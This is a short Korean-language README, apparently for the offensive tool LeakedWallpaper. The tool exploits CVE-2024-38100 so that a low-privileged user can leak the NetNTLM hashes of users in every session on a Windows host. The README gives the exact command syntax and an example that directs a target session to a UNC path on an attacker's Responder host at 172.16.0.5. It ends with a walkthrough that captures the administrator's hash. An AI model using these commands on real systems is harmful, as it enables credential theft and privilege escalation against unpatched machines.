
임의 사용자의 NetNTLM 해시 유출. KB5040434에서 수정됨.
KB5040434 업데이트에서 CVE-2024-38100으로 수정된 취약점을 이용하는 권한 상승 도구로, 낮은 권한의 사용자로 작업 중이더라도 컴퓨터의 모든 세션에서 사용자의 NetNTLM 해시를 유출할 수 있게 해줍니다.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
차단된 경우 demo.mkv를 참조하세요.
호스트에 두 개의 세션이 있다고 가정해 봅시다.
현재 세션 ID: 2
대상 세션 ID: 1

Responder IP: 172.16.0.5
Windows IP: 172.16.0.2

도구를 사용하여 administrator의 NetNTLM 해시를 얻어 봅시다!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
성공!
